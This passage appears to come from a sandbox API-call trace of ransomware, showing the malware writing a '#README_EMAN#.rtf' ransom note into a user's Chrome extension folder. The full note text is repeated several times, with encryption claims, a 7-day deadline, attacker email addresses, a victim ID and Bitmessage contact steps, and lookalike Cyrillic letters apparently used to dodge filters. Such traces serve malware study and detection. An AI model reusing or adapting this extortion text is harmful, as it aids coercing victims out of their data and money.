BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nzráb\x95.ê©ÀAH\x01¹HÂP[w.\x80¬Ñ%cD", lpUsedDefaultChar=0x0) returned 8717 [0278.580] WriteFile (in: hFile=0x2c8, lpBuffer=0x1ef5068*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef5068*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.581] CloseHandle (hObject=0x2c8) returned 1 [0278.581] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\#readme_eman#.rtf")) returned 0xffffffff [0278.581] GetLastError () returned 0x2 [0278.581] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0278.582] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.582] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.582] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef5068, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 